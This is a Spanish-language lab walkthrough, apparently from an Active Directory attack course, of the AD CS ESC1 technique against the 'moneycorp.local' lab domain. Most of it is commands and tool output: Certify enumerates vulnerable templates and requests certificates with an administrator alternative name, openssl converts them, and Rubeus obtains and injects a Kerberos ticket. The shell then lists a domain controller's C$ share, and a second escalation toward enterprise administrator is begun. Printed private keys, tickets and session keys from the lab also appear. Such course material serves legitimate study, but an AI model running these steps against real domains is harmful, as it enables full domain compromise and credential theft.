AD CS - ESC1
La plantilla "HTTPSCertificates" tiene el valor ENROLLEE_SUPPLIES_SUBJECT para msPKI-Certificates-Name-Flag.
PS C:\ad\tools\openssl> ..\Certify.exe find /enrolleeSuppliesSubject
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'
[*] Listing info about the Enterprise CA 'moneycorp-MCORP-DC-CA'
Enterprise CA Name : moneycorp-MCORP-DC-CA
DNS Hostname : mcorp-dc.moneycorp.local
FullName : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
Cert Thumbprint : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
Cert Serial : 48D51C5ED50124AF43DB7A448BF68C49
Cert Start Date : 11/26/2022 1:59:16 AM
Cert End Date : 11/26/2032 2:09:15 AM
Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local
[!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names!
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
Allow ManageCA, ManageCertificates mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Enrollment Agent Restrictions : None
Enabled certificate templates where users can supply a SAN:
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : WebServer
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SubCA
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : <null>
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : HTTPSCertificates
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\RDPUsers S-1-5-21-719815819-3726368948-3917688648-1123
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519
Certify completed in 00:00:22.2161427Para los usuarios del grupo RDPUsers como es nuestro usuario. Entonces, emitimos el certificado.
PS C:\ad\tools\openssl> ..\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Request a Certificates
[*] Current user context : dcorp\student723
[*] No subject name specified, using current context as subject.
[*] Template : HTTPSCertificates
[*] Subject : CN=student723, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] AltName : administrator
[*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 36
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA2XkO5Vi9IRx2P64CZyucBrDZkCSGfbS1zK+HbGmdRdQlTgnv
wkb/VgCYfCRcbjmp/ykxajGv5poobwrqUvDi4kPUQJ+O1dntruV76s+T01z0Ecqx
tffvzFfKsZ6GGlX3x9FRXjrXgmmNNNFWp6SnwwYxjvL7qGeU3moqqntehb+ww6pk
VSUpnBuMQBtSv1rXIGu0+V3hJDMIUNPDkqsUOAphy18nyJSx7RvU7juS7NgIJZjK
nHITGkxHs8sOuFa1sO3hO3gtgOPOBkYubSY7X6X1w7qvVMl9jt/VFT6V3vukBMwj
3FPqhC/LhkgYzh8GZCDyeeXRgboUlT/sFu4LrQIDAQABAoIBAQDOpgUslBUr2ILY
4f3wkXTyuqwSF1MhMk2qkYTq1LUYvI0ySajlgFdzHp/HHzohl3PdPgRxt4NBam1P
jxy48aN2hCO1wKiWtz3u+qu0pcj/iI14NpaFpnLcRvQZsdwWPGh2HIXoN5u/lZMT
hHSGWqT7YfBHuMa/8KV6b4HZe9+G0K54P6lAArHT3jPlo83o64dDcWiVja1XN/Ys
GSHlsDmP+D7yo3BAOqqW4AoXXETkVqw7wYhYtNpxOQICXEhuvmlxk4VkaCMG0a3C
x7/8/vbzCv7CRxOshznLlISdgMKD0sFgkbo4FL33JmfP8cS88QwuSsJicRt2gqsS
nRsWJnSVAoGBAPP5cm8Gyo9/SUNEOrSFntgyHr/dNnjgKnGaVYYRJWweV/OiWKFB
DoQpaDOnSxodhNCVarlcAXSHn4fIg9Abglji9v7HTpHmaPbEfC+0HYae1SsKEtQu
VBwqf696ABsHbyocD3JJeT7Gs2aB4nifT3MBfTvO+DE1Vz+Gd6QdEcnfAoGBAOQx
NLVpzD7mXZSaScx/cHrNOwe4P4R+uvvDp5c+0/dhZOvqB69po5NqAF/n0W4jzLal
k97zdMdoyK596uJN9M7rnaB/DMPCBdhaSYzI6gor48npABxqNo7RNSruCLTXzGLP
KMWDBg5YqsO6gdCUmnOMxXXeS3SeXPKCrWfurDPzAoGBAImI+MKwMGaemd1qzDFS
Fk7ISl9cxEV2EVdDaq0OY2tE284DmjUlaJqGgTCFQagyNdokMSrXPBbGEd/I4M3j
hCK5qAXOs3M6Ubey4lM+FVr7lS4TGrQ0fcP3DU4N15tlIHy7ntWNp+UEvMOvuszG
+lHZ6BBcR7vt1wZ/tlh07r8/AoGAOCt0kgNM517FQkMIT3I/ObszAJ914yNe24I5
yp0IiChNM1UUNzWFsk+xb+ocP0RIq9zuHT9IS52baHhOTQ5raFPPJSag+b7UuYDg
Aeui0IYlOBpGkLgEXftZXwvg0MMd6GSd4KBz6SwiPLO4KKOrsS3BnVXutPIWZwuL
q72wXckCgYEAmpnpZ6pJsCFNJQjx7HcWXq82Bq0BeGtLaK80C8lbNAbJcEzWal3a
GzA3ca92nXqWqWgjXCw/1P0ex3RrLIkISlU1O4Do58T8Kcl3PtYEoWkTwWFj+ojE
KvBOiLtQApMTwDmsfjEheCstRWF7+YVWfQdOxDQm8Ii3Mo8wmTKpkuQ=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGYjCCBUqgAwIBAgITFQAAACT29zy+spiOtAAAAAAAJDANBgkqhkiG9w0BAQsF
ADBSMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxGTAXBgoJkiaJk/IsZAEZFgltb25l
eWNvcnAxHjAcBgNVBAMTFW1vbmV5Y29ycC1NQ09SUC1EQy1DQTAeFw0yNDAzMDUw
MzMwMTZaFw0yNjAzMDUwMzQwMTZaMHMxFTATBgoJkiaJk/IsZAEZFgVsb2NhbDEZ
MBcGCgmSJomT8ixkARkWCW1vbmV5Y29ycDEaMBgGCgmSJomT8ixkARkWCmRvbGxh
cmNvcnAxDjAMBgNVBAMTBVVzZXJzMRMwEQYDVQQDEwpzdHVkZW50NzIzMIIBIjAN
BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2XkO5Vi9IRx2P64CZyucBrDZkCSG
fbS1zK+HbGmdRdQlTgnvwkb/VgCYfCRcbjmp/ykxajGv5poobwrqUvDi4kPUQJ+O
1dntruV76s+T01z0EcqxtffvzFfKsZ6GGlX3x9FRXjrXgmmNNNFWp6SnwwYxjvL7
qGeU3moqqntehb+ww6pkVSUpnBuMQBtSv1rXIGu0+V3hJDMIUNPDkqsUOAphy18n
yJSx7RvU7juS7NgIJZjKnHITGkxHs8sOuFa1sO3hO3gtgOPOBkYubSY7X6X1w7qv
VMl9jt/VFT6V3vukBMwj3FPqhC/LhkgYzh8GZCDyeeXRgboUlT/sFu4LrQIDAQAB
o4IDDjCCAwowPQYJKwYBBAGCNxUHBDAwLgYmKwYBBAGCNxUIheGocofMn2jhhyaC
n65RgvL2fYE/hpePdoe0hBICAWQCAQYwKQYDVR0lBCIwIAYIKwYBBQUHAwIGCCsG
AQUFBwMEBgorBgEEAYI3CgMEMA4GA1UdDwEB/wQEAwIFoDA1BgkrBgEEAYI3FQoE
KDAmMAoGCCsGAQUFBwMCMAoGCCsGAQUFBwMEMAwGCisGAQQBgjcKAwQwRAYJKoZI
hvcNAQkPBDcwNTAOBggqhkiG9w0DAgICAIAwDgYIKoZIhvcNAwQCAgCAMAcGBSsO
AwIHMAoGCCqGSIb3DQMHMB0GA1UdDgQWBBQTWMeRA2EyvVtk6YcNAAgfhdvnvTAo
BgNVHREEITAfoB0GCisGAQQBgjcUAgOgDwwNYWRtaW5pc3RyYXRvcjAfBgNVHSME
GDAWgBTR/o0Kp/q0Mp82/CC498ueaMVF7TCB2AYDVR0fBIHQMIHNMIHKoIHHoIHE
hoHBbGRhcDovLy9DTj1tb25leWNvcnAtTUNPUlAtREMtQ0EsQ049bWNvcnAtZGMs
Q049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENO
PUNvbmZpZ3VyYXRpb24sREM9bW9uZXljb3JwLERDPWxvY2FsP2NlcnRpZmljYXRl
UmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Q
b2ludDCBywYIKwYBBQUHAQEEgb4wgbswgbgGCCsGAQUFBzAChoGrbGRhcDovLy9D
Tj1tb25leWNvcnAtTUNPUlAtREMtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUy
MFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bW9uZXlj
b3JwLERDPWxvY2FsP2NBQ2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0
aWZpY2F0aW9uQXV0aG9yaXR5MA0GCSqGSIb3DQEBCwUAA4IBAQCie2uXejB1PVIl
e6RWt3eS83qM7sCITDvjrZtj3ZOAPlY85AqofRBFmT4bsdFPN/eQTYkcjJwDO0pK
9Xa8OvJgrT+Yl/7+zbZlLEDBGQo6WGlfxUZBYKwoUPnOY3oswl/fDKGL/4wyWNrd
sq/820784GdKFHwz3uE4MMETES7Aw3D8nkqCPRr5GMlXKoWFso4KATNc/jC6DjAe
vHQjgeOzt0w+DPOAX/WzcC4xQXtgwNXwRVWkGYxqAV7K+0CBZTzRcb1eh9O4yGBk
aoczWcO+O9e7a7m7kGJbNvxtP/i4OcI9XLYjC0HNj4lvilGIWCSeR/4oNDSN8tXc
tdjIRsT3
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Comvertimos el fichero cert.pem en pfx.
PS C:\ad\tools\openssl> .\openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc1.pfx
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
Enter Export Password:
Verifying - Enter Export Password:
PS C:\ad\tools\openssl>Importamos el ticket.
PS C:\ad\tools\openssl> ..\Rubeus.exe asktgt /user:administrator /certificate:esc1.pfx /password:SecretPass@123 /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=student723, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dollarcorp.moneycorp.local\administrator'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
ZG9sbGFyY29ycC5tb25leWNvcnAubG9jYWw=
[+] Ticket successfully imported!
ServiceName : krbtgt/dollarcorp.moneycorp.local
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : administrator
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/4/2024 7:44:38 PM
EndTime : 3/5/2024 5:44:38 AM
RenewTill : 3/11/2024 8:44:38 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : 1vEM/DLY532RWShi5JRyeA==
ASREP (key) : 5E2FB1414E1E60853B74A0BBB8A03063
PS C:\ad\tools\openssl>Comprobamos los privilegios.
PS C:\ad\tools\openssl> ls \\dcorp-dc\C$
Directory: \\dcorp-dc\C$
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 11/14/2022 10:12 PM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 3/4/2024 7:33 AM Users
d----- 1/10/2024 12:59 AM Windows
Ahora a Enterprise Admin
Solicitamos el ticket.
C:\AD\Tools\openssl>..\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:moneycorp.local\administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Request a Certificates
[*] Current user context : dcorp\student723
[*] No subject name specified, using current context as subject.
[*] Template : HTTPSCertificates
[*] Subject : CN=student723, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] AltName : moneycorp.local\administrator
[*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 41
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAvdDIc2ojtCVWp8qoIIB4i5X3fBmPLfwjRi/lL8tDwNTEiz1p
aSUZu/RxxePX4nCPfIrWqwsKaQ2jqvf4lXKPTDbTWD7zJqgQB3tMglpIixw57s8r
fqcuwHVkF5AGiFuAQ02JVM6UNrAbMNdl2Nlvo7oXESLg1O7ipjKosuGcrqzwj8dj
mYHh7iLTjEr2SRDgfRWT+Sgh5qkXFbCdvhssguZf+d68hpsG+UCDH0sld991GFuw
uf7rJOJG/gzba4LxeQeBHElGyy0RpatfxBqTMyElDW6F2Oa0g3rYxv+VLOyEM6bQ
KRqplaGH1SLXp4msHZzr7m6aqmN3WF6JBju+bQIDAQABAoIBAFZyOohNo3sMsj1y
j0VWHRA9OVv8a/feZ9Y0Q+WTZgTxIZ3kVxh6vBCckCA21wAakU6AEKoPOiuD+bEI
g97UMKzeHzyGVsiZK8usfLi1E2q/bSb0lPN2glVGYVJV1pPNUEnWix/jgR6y7387
6fdrd2uSeaTlRI3VScW1Np1ZILlv4rBa8aKGpQ3grFxHUbo+DMjOlRShLYrTK7nt
tS2YeDxHC+cDsIExdAcwvtReIgnedjGtz5qTiQBsEAvCybZa5CX2iuPY8kRDPTPc
eNxJEPDVoaByvRnHzWWZ6BgKA2zuZGjzs8JDpFr7/mrnk8x94G76Ww/U2c54WnFG
xa/UxQUCgYEA43NBc+zepQpDuZ1ZPUHYm2XlAGKV9Lt1FYZH6Jt6jzaPv/29rOE6
npN1v/08NlbFJ3vN5z7fX51W6MXt9OP4XtDxyfuZrtFft5SpSn0JyBun7/rOJ7U2
hlq7GJFkXvxHrrSFKzsVG6P+HwnmXzxaeTxEiPh/3XSyZ6MmJXC/tU8CgYEA1aQy
0w6lP5z3ljllYEJcU+MkEnVd7pcjuNn5cd8I087EfulBJu8Lo38qO8b4WOBF3Zf9
pZdVAEFZXBOTQMjpHRm1QA6vHMOoyKQoxKNUcFR1zFrD3REuASbcBgKWw8fm9dZ6
um7LY1PeWyyjNYrp7B7hBxKmPXxZJaa273zu2YMCgYEApIoSRXyLrDT6vWI41nm1
6uURfu/Sr1KU5tdXWcxwIv5Di45SEqh0sZbXTeYyEtU+lsuXLrxq905pOsdE1y27
1UuuPoIGsVLBvZqLxVkjJGHtYUu8qzkKkrM8Og+j3pr+eEIbPCTnpjFCes28nBSb
Fq0knzm1tkzfat25kMg5xz0CgYEAzm8Q5Tu7lVI5MqFXQcIdsLlEe8mI8Ch+zflh
vRREVVXwLKl62QIW/u67gnNqOYbMO6jH4R/vdIWwsPYBTZJVHlde+fy2XFb7WpS1
B/zCdKBICySRKaWWDGreI7iQsbERjO6oPEkeomXB79ucAPqvugbEba8pjzP+eBE1
pwfTS70CgYBV1I41aWEbQ+uFeMu4FgFSHkNZkr0T4YtpWbZsG3SJh0EDFlR2FDOG
OROIKhSlDqLhRVB8EHRq9YNbnfbxPx3UzK9cB1Qy4an2YbvSqWR67e44VnWepxJg
qARw7mR/VM1a9DQdNC+QvL3tLtShNAG9Ouv6FxwyZUKuDRSHyOIcTQ==
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGcjCCBVqgAwIBAgITFQAAACkrjprXHSMJRQAAAAAAKTANBgkqhkiG9w0BAQsF
ADBSMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxGTAXBgoJkiaJk/IsZAEZFgltb25l
eWNvcnAxHjAcBgNVBAMTFW1vbmV5Y29ycC1NQ09SUC1EQy1DQTAeFw0yNDAzMDUw
MzQ4MDRaFw0yNjAzMDUwMzU4MDRaMHMxFTATBgoJkiaJk/IsZAEZFgVsb2NhbDEZ
MBcGCgmSJomT8ixkARkWCW1vbmV5Y29ycDEaMBgGCgmSJomT8ixkARkWCmRvbGxh
cmNvcnAxDjAMBgNVBAMTBVVzZXJzMRMwEQYDVQQDEwpzdHVkZW50NzIzMIIBIjAN
BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvdDIc2ojtCVWp8qoIIB4i5X3fBmP
LfwjRi/lL8tDwNTEiz1paSUZu/RxxePX4nCPfIrWqwsKaQ2jqvf4lXKPTDbTWD7z
JqgQB3tMglpIixw57s8rfqcuwHVkF5AGiFuAQ02JVM6UNrAbMNdl2Nlvo7oXESLg
1O7ipjKosuGcrqzwj8djmYHh7iLTjEr2SRDgfRWT+Sgh5qkXFbCdvhssguZf+d68
hpsG+UCDH0sld991GFuwuf7rJOJG/gzba4LxeQeBHElGyy0RpatfxBqTMyElDW6F
2Oa0g3rYxv+VLOyEM6bQKRqplaGH1SLXp4msHZzr7m6aqmN3WF6JBju+bQIDAQAB
o4IDHjCCAxowPQYJKwYBBAGCNxUHBDAwLgYmKwYBBAGCNxUIheGocofMn2jhhyaC
n65RgvL2fYE/hpePdoe0hBICAWQCAQYwKQYDVR0lBCIwIAYIKwYBBQUHAwIGCCsG
AQUFBwMEBgorBgEEAYI3CgMEMA4GA1UdDwEB/wQEAwIFoDA1BgkrBgEEAYI3FQoE
KDAmMAoGCCsGAQUFBwMCMAoGCCsGAQUFBwMEMAwGCisGAQQBgjcKAwQwRAYJKoZI
hvcNAQkPBDcwNTAOBggqhkiG9w0DAgICAIAwDgYIKoZIhvcNAwQCAgCAMAcGBSsO
AwIHMAoGCCqGSIb3DQMHMB0GA1UdDgQWBBS5oLc86K6x6Hl5GdRieHQbab3cvTA4
BgNVHREEMTAvoC0GCisGAQQBgjcUAgOgHwwdbW9uZXljb3JwLmxvY2FsXGFkbWlu
aXN0cmF0b3IwHwYDVR0jBBgwFoAU0f6NCqf6tDKfNvwguPfLnmjFRe0wgdgGA1Ud
HwSB0DCBzTCByqCBx6CBxIaBwWxkYXA6Ly8vQ049bW9uZXljb3JwLU1DT1JQLURD
LUNBLENOPW1jb3JwLWRjLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNl
cyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1vbmV5Y29ycCxEQz1s
b2NhbD9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9
Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgcsGCCsGAQUFBwEBBIG+MIG7MIG4BggrBgEF
BQcwAoaBq2xkYXA6Ly8vQ049bW9uZXljb3JwLU1DT1JQLURDLUNBLENOPUFJQSxD
Tj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1
cmF0aW9uLERDPW1vbmV5Y29ycCxEQz1sb2NhbD9jQUNlcnRpZmljYXRlP2Jhc2U/
b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
AAOCAQEAwY2cmph+2qywOsf/K1UKnHCEmZY+PC9zkYO2g1YLx4cxnb9+c08xPKEH
d3TPHNUleGpTngfMXvDyYlY0XNV6nLytPfqVEPy89CmukMSB1PTYZAUJSE9tcJFg
6BEo1ZwXwoRO8bHFFSdOXN1z5/ybHbALXtJSsNw3oMEtJyd8bsdjU+dVghzh3YlT
JHD1IVGMVp6PB6PL/QTqbtdQZbf9PBagdu7jhE8uYO505Nws/HreXKsq5ZgNOhHG
1ut5W4YAmX1U+WAjFMOafngugVS8U7fmZ33V3uO0oifey3XQXlxhdrzdPh/x6+tx
gRhJodM+bJabtOwG1Rz8YK1FA6t4AA==
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:11.6746787
C:\AD\Tools\openssl>Cambiamos el cert.pem por .pfx.
C:\AD\Tools\openssl>.\openssl.exe pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc1.pfx
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
Enter Export Password:
Verifying - Enter Export Password:
Y ahora lo cargamos usando rubeus.
